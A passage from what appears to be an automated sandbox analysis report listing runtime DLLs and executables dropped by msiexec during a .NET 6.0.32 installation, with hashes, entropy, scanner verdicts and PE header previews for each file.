                                                                                                                                                                                                                                        SHA1:6A1FF3405277250A892B79FAED01DCDC9DBF864A
                                                                                                                                                                                                                                        SHA-256:14694879F9C3C52FBD7DDE96BF5D67B9768B067C80D5567BE55B37262E9DBD54
                                                                                                                                                                                                                                        SHA-512:D496F0C38300D0EED62B26A59C57463A1444A0C77A75C463014C5791371DECA93D1D5DD0090E8E324C6A09BD9CFF328F94947272CA49018C191C12732E805EE8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....A............" .........@...............................................P......4.....`A........................................P................@...............@...!..............p............................................................................rdata..>........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.454858890873412
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:PLGju+OXWvhW+eWYnO/VWQ4mWPiNbj21EhqnajKsxy:PLGjuJWvhWFUztqslGsxy
                                                                                                                                                                                                                                        MD5:DACF383A06480CA5AB70D7156AECAB43
                                                                                                                                                                                                                                        SHA1:9E48D096C2E81A7D979F3C6B94315671157206A1
                                                                                                                                                                                                                                        SHA-256:00F84C438AAB40500A2F2DF22C7A4EC147A50509C8D0CDAC6A83E4269E387478
                                                                                                                                                                                                                                        SHA-512:5D4146A669DDB963CF677257EC7865E2CFCB7960E41A38BBD60F9A7017474ED2F3291505FA407E25881CBF9E5E6B8055FF3BD891043284A0A04E3FE9CFAD9817
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d................." .........0...............................................@......w.....`A........................................P..."............0...............0...!..............p............................................................................rdata..r...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.950541424159939
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:RSnWlC0i5CtWvhWJKWYnO/VWQ4SWuMasxZAqnajT9CQMDt:RSnWm5CtWvhWWUyas/Al39ODt
                                                                                                                                                                                                                                        MD5:D725D87A331E3073BF289D4EC85BD04D
                                                                                                                                                                                                                                        SHA1:C9D36103BE794A802957D0A8243B066FA22F2E43
                                                                                                                                                                                                                                        SHA-256:30BCF934CBCC9ED72FF364B6E352A70A9E2AFA46ECEADEA5C47183CB46CFD16E
                                                                                                                                                                                                                                        SHA-512:6713FF954221C5DD835C15556E5FA6B8684FA7E19CE4F527A5892E77F322B3DAE7199A232040B89AD4A9575C8D9788D771892D2294F3C18DA45E643EB25FDB08
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d......0.........." .........0...............................................@............`A........................................P................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.591111522505104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:PUFY17aFBRIWvhWrWYnO/VWQ4mWCJH2vArqnajKsbTYxj:8Q1WvhWLUrH24rlGsbTY5
                                                                                                                                                                                                                                        MD5:9151E83B4FDFA88353B7A97AE7792678
                                                                                                                                                                                                                                        SHA1:B46152E70D5D3D75D61D4CCDB50403BD08BB9354
                                                                                                                                                                                                                                        SHA-256:6C0E0D22B65329F4948FCF36C8048A54CCCCBF6C05B330B2C1A686F3E686EED0
                                                                                                                                                                                                                                        SHA-512:4D4210474957E656D821E1DC5934A4BFBF7E73DD61D696A1AB39914F887810C8FBE500DBB1E23782B40807F25820F35C9665E04DCDC2FD0F6C83046A4AECB86B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...G..d.........." .........0...............................................@............`A........................................P................0...............0...!..............p............................................................................rdata..f...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.54281367075804
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:g8yWvhWVWYnO/VWQ4mWWeUDj21EhqnajKsxRIM9:gtWvhWFUtDqslGsxRIG
                                                                                                                                                                                                                                        MD5:EBC168D7D3EA7C6192935359B6327627
                                                                                                                                                                                                                                        SHA1:AECEB7C071CF1BB000758B6CEEBEFEEC91AD22BD
                                                                                                                                                                                                                                        SHA-256:C048A3D7AB951DCE1D6D3F5F497B50353F640A1787C6C65677A13C55C8E99983
                                                                                                                                                                                                                                        SHA-512:891D252ECD50BDED4614547758D5E301BDF8E71FBB1023FF89F8DE2F81927CC7CC84B98985D99E8FA8DCBF361E5117D9C625DC0D36983AFC3F2AA48A54CE3D48
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....h\..........." .........0...............................................@......}.....`A........................................P...e............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29144
                                                                                                                                                                                                                                        Entropy (8bit):4.946641263598223
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:MQM4Oe59Ckb1hgmLJWvhWdUN8HOhlxAnY:rMq59Bb1jeanOunY
                                                                                                                                                                                                                                        MD5:7A235962DBAB1E807C6EC7609FC76077
                                                                                                                                                                                                                                        SHA1:148DDD11A0D366313F75871007057B3F0485AB33
                                                                                                                                                                                                                                        SHA-256:F7C5D7394643C95FE14C07773A8A206E74A28DB125F9B3976F9E1C8C599F2AF1
                                                                                                                                                                                                                                        SHA-512:25B21EE7BB333E5E34D2B4A32D631A50B8FFAF1F1320D47C97C2A4DFF59FA2A2703CDF30638B46C800D3150EFAA4A2518C55E7B2A3B2E4273F43DD5CA83AE940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...J..R.........." .........P...............................................`............`A........................................P....%...........P...............P...!..............p............................................................................rdata...&.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29136
                                                                                                                                                                                                                                        Entropy (8bit):4.764408242494898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:VA/kPLPmIHJI6/CpG3t2G3t4odXLJWvhWSUwlmX7aJdlGszti:y/kjPmIHJI6AFc7aJGT
                                                                                                                                                                                                                                        MD5:B3B4A0F3FCE120318E71DE3AFB6BB1AA
                                                                                                                                                                                                                                        SHA1:D3349409EC717F942769BA67FECA40557C1423D0
                                                                                                                                                                                                                                        SHA-256:A38E6786DC8EC6D2717343DBE00BB2FDDA008D87935BBD9371AE94E7E004270B
                                                                                                                                                                                                                                        SHA-512:4A130674DDBB05949665F6F7A070B25E82C34047D1E62EC60C73F815CED39A9041D972BE4E8C505F9B13C5BCDC114F3479BF8D69D7D9CF9987D39A6F5DB7F560
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....T............" .........P...............................................`............`A........................................P.... ...........P...............P...!..............p............................................................................rdata..D".......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-private-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):74192
                                                                                                                                                                                                                                        Entropy (8bit):5.1227875842071615
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:LLraHgDe5c4bFe2JyhcvxXWpD7d3334BkZnjPgB/P5W:baHgDe5c4bFe2JyhcvxXWpD7d3334Bkb
                                                                                                                                                                                                                                        MD5:7033AB91EA4F0593E4D6009D549E560F
                                                                                                                                                                                                                                        SHA1:4951CE111CA56994D007A9714A78CDADEEB0DACF
                                                                                                                                                                                                                                        SHA-256:BE7901AA1FACEA8E1FD74A62BDE54CC3BD8E898B52E76FABB70342B160989B80
                                                                                                                                                                                                                                        SHA-512:8BC3B880E31EBE3BC438A24D2AF249C95E320AC3C7A501027EF634F55AAB6FAC4F6D1090A00C29A44657A34EBADCD62023F2E947D31C192072698B645F8651ED
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....+..........." ................................................................e.....`A........................................P....................................!..............p............................................................................rdata..............................@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.608840616484201
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:4adyqjd7VWvhWpWYnO/VWQ4mWB8nXEKup3JdqnajKszt0CkD:4aQ0WvhWpUnX7aJdlGszt0r
                                                                                                                                                                                                                                        MD5:55463244172161B76546DC2DE37F42BD
                                                                                                                                                                                                                                        SHA1:C10A5360AD5E340D59C814E159EA1EFCBF5BF3EE
                                                                                                                                                                                                                                        SHA-256:4166A32551989F960DAC7C0E296FFB28092F45F6539E7C450FA04BF17612BE73
                                                                                                                                                                                                                                        SHA-512:EACEC78FF95F60DEF6F7F27BDA4A84F1DD2DFA386EFC4F6DA770C37268DF83C5B402693EA5C29F54D48026579F3843DB26ADD4D6448EA10CBF7F14D4D14A72FD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....w>..........." .........0...............................................@......M.....`A........................................P...x............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25040
                                                                                                                                                                                                                                        Entropy (8bit):4.795732177662406
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:oHUW9MPrpJhhf4AN5/KiZWvhWMWYnO/VWQ4mWLz8Y5H2vArqnajKsbTYCkI:oHUZr7PWvhW6UeH24rlGsbTYCx
                                                                                                                                                                                                                                        MD5:27C4A3BCC0F1DBA2DE4C2242CD489F3B
                                                                                                                                                                                                                                        SHA1:A704FD91E3C67108B1F02FD5E9F1223C7154A9CC
                                                                                                                                                                                                                                        SHA-256:315DED39D9E157CEC05D83711C09858C23602857C9D8C88BEEF121C24C43BE84
                                                                                                                                                                                                                                        SHA-512:793E74DFB1052C06AB4C29E7B622C795CC3122A722382B103940B94E9DAC1E6CA8039DF48C558EFCC5D952A0660393AE2B11CED5ADE4DC8D5DD31A9F5BB9F807
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...4{.+.........." .........@...............................................P............`A........................................P...4............@...............@...!..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25040
                                                                                                                                                                                                                                        Entropy (8bit):5.082770273323341
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:DA2uWYFxEpahrWvhW/nWYnO/VWQ4mWSmRkH2vArqnajKsbTYMlBzK:DIFVhrWvhWfUERkH24rlGsbTYx
                                                                                                                                                                                                                                        MD5:306608A878089CB38602AF693BA0485B
                                                                                                                                                                                                                                        SHA1:59753556F471C5BF1DFEF46806CB02CF87590C5C
                                                                                                                                                                                                                                        SHA-256:3B59A50457F6B6EAA6D35E42722D4562E88BCD716BAE113BE1271EAD0FEB7AF3
                                                                                                                                                                                                                                        SHA-512:21B626E619AAF4EDA861A9C5EDF02133C63ADC9E893F38FEDE72D90A6E8BE0E566C117A8A24CA4BAB77928083AE4A859034417B035E8553CC7CCFB88CB4CBD9C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...+b............" .........@...............................................P......'l....`A........................................P...a............@...............@...!..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25040
                                                                                                                                                                                                                                        Entropy (8bit):5.075489018611419
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:dozmT5yguNvZ5VQgx3SbwA71IkFPaPA6XHPe:dozmT5yguNvZ5VQgx3SbwA71IAaP7XH2
                                                                                                                                                                                                                                        MD5:EC1381C9FDA84228441459151E7BADEA
                                                                                                                                                                                                                                        SHA1:DB2D37F3C04A2C2D4B6F9B3FD82C1BE091E85D2C
                                                                                                                                                                                                                                        SHA-256:44DDAB31C182235AC5405D31C1CBA048316CC230698E392A732AC941EC683BAD
                                                                                                                                                                                                                                        SHA-512:EE9EBBDC23E7C945F2B291FDE5EB68A42C11988182E6C78C0AB8FA9CB003B24910974A3291BCDAA0C8D1F9DFA8DF40293848FB9A16C4BE1425253BED0511A712
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d....w.e.........." .........@...............................................P......0.....`A........................................P................@...............@...!..............p............................................................................rdata../........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):5.000234308172749
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:SNDKWvhW/WYnO/VWQ4mWVx2RoXEKup3JdqnajKsztg/J:RWvhWvUexqoX7aJdlGsztgx
                                                                                                                                                                                                                                        MD5:4CF70855444F38E1EB71F9C3CD1C6E86
                                                                                                                                                                                                                                        SHA1:D06AEC4008D397756EE841F0E7A435D1C05B5F07
                                                                                                                                                                                                                                        SHA-256:A409E25A9D3C252CC0A5AF9DF85D3733E946087B06CD1FB2CF1BF640EB0D49BA
                                                                                                                                                                                                                                        SHA-512:A13A80645E679343AC5638E8AA6A03012F16200CB3A4637BE52A01AA3BEF854324A8ED1882CA91B304B9C47B6351B1FC1671F4DEDE5BE77BC208A71FE6029064
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....p..........." .........0...............................................@............`A........................................P................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20944
                                                                                                                                                                                                                                        Entropy (8bit):4.5308703760687745
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:6PjfHQduHWvhWjWYnO/VWQ4mWEwXBXEKup3JdqnajKsztqOT+:QfxWvhWjUoXBX7aJdlGsztqx
                                                                                                                                                                                                                                        MD5:FCD6B29932D6FB307964B2D3F94E6B48
                                                                                                                                                                                                                                        SHA1:BE560F8A63C8E36A7B3FA48FF384F99F69A5D4F7
                                                                                                                                                                                                                                        SHA-256:CFB2EE4E426BB00B76163C1A66CF8CFEF8D7450CBF9BBCE3BC9EB2053F51E0E5
                                                                                                                                                                                                                                        SHA-512:3EDFCF559F1E21870277358E6D266A1A0CEA68B163B11C73108F3B6A56006D20B51410A3B4EA39BF80906BF6C9D573E1072697CFCD6A3D37E3679EA54757C69F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d...w............." .........0...............................................@............`A........................................P...^............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):304800
                                                                                                                                                                                                                                        Entropy (8bit):4.2336898246942685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:REX9Xit++0PJSKtOJsgI3mwNdmLZ8mTQfsqxEdB:S9xacWIfsqOD
                                                                                                                                                                                                                                        MD5:DBEB3E7BAE9873B4317F7E581AAF7DA5
                                                                                                                                                                                                                                        SHA1:9008A7E3F3CC8CA70DE2A6501514E1BC89B480B0
                                                                                                                                                                                                                                        SHA-256:1498113CBB7EECF7CC591502DC70C138165CFBABBCBB013E103C98357EC9C9EC
                                                                                                                                                                                                                                        SHA-512:4E5EE6CD29DD31F0881DF453726472166489E4AA6E2F2C98271FD79ED37C0B4022C37F684265EE790687D9925B04127639A1487FC1608F7B5FAB8ED643B69D24
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j=.I.S.I.S.I.S..~..H.S..~Q.H.S.RichI.S.PE..d.....lf.........." .........|......................................................b.....`.......................................................... ..xx...........~...(..............T............................................................................rdata..X...........................@..@.rsrc...xx... ...z..................@..@......lf........l...l...l.........lf..........................lf........l...................................RSDS.An[...E.A.ki.......D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\clretwrc\clretwrc.pdb.............................T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... .......rsrc$01.....!..hw...rsrc$02....................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1436848
                                                                                                                                                                                                                                        Entropy (8bit):6.4837820325046405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:fLtbu58TIu2rlMBDr0PZYRhVj95f1L7Zr5/z/5ccUYXIBXzkTVsHgWolUZbGwqfy:fLtHAcX0PZuhVDh7ZN7/6YXIBjkBsHgy
                                                                                                                                                                                                                                        MD5:7B4375E2D9212108130ACA9438B204B4
                                                                                                                                                                                                                                        SHA1:8AD0A3C29A02429FA4233E0CBE09897EB3960A46
                                                                                                                                                                                                                                        SHA-256:C8C62D5043E1E16089B85BADC0D41DAA4B8EBCBE8608435783C07679BACD159E
                                                                                                                                                                                                                                        SHA-512:FD33720895EBEB0074727A38F467209CBE763600476687F42E9727486133B9293F8D18C016CA14991D1671EC87AB09F8722645C54B1E326282E480F801F8B264
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2.US..US..US..\+..YS...!..RS..US...S...&..tS...&..[S...&..\S...&..>S...&..TS...&y.TS...&..TS..RichUS..........................PE..d.....lf.........." .....,................................................... ......^A....`A............................................t....................0..@........(......|.......p....................k..(...@...8............@...............................text....*.......,.................. ..`.rdata.......@.......0..............@..@.data....<..........................@....pdata..@....0......................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\coreclr.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5125400
                                                                                                                                                                                                                                        Entropy (8bit):6.552600854604914
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:TRUteSi8SjfXq6ZlxPCEsBfdSf30d9A6oWUqSp0eTVRapiB8YNCdT2eBRJoqN2nc:9U6RxPCEwpJc5H8GatXj
                                                                                                                                                                                                                                        MD5:3F517CD4D560FF7C81CA4E0ACF375A96
                                                                                                                                                                                                                                        SHA1:53375106AD45031329A0FB075C0D3193C4A8FAC6
                                                                                                                                                                                                                                        SHA-256:64E1C7636E731BB9DD30ADF26526BA69A64786F0D4C6979265CB5575AD1ABFF2
                                                                                                                                                                                                                                        SHA-512:C7FBA2ECE43B3328F5A041407EA4D729BDBCCC65869E7540C7CA1AB558FACCE9E434812C362131CF9D04573D3EDD5460747DEBC175E45BFCEF281546C94476A6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.*.Nuy.Nuy.Nuy.6.y.Nuyj<qx.Nuyj<tx.Nuy.Nty.Ouy.;px.Nuy.;qx.Nuy.;vx.Nuys;vx.Nuys;{xlOuys;ux.Nuys;.y.Nuys;wx.NuyRich.Nuy................PE..d....lf.........." ......<...................................................O......N...`A.........................................LI.D...TMI......`O...... K.8.....N..)...pO.Pa....>.p.....................?.(...p.=.8.............<......JI.`....................text...a.<.......<................. ..`.CLR_UEF\.....<.......<............. ..`.rdata........<.......<.............@..@.data... .....I..:...PI.............@....pdata..8.... K.......I.............@..@.didat..8.....N......hL.............@...Section.......N......jL.............@..._RDATA...3... N..4...lL.............@..@.rsrc........`O.......M.............@..@.reloc..Pa...pO..b....M.............@..B........................................................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\createdump.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):58208
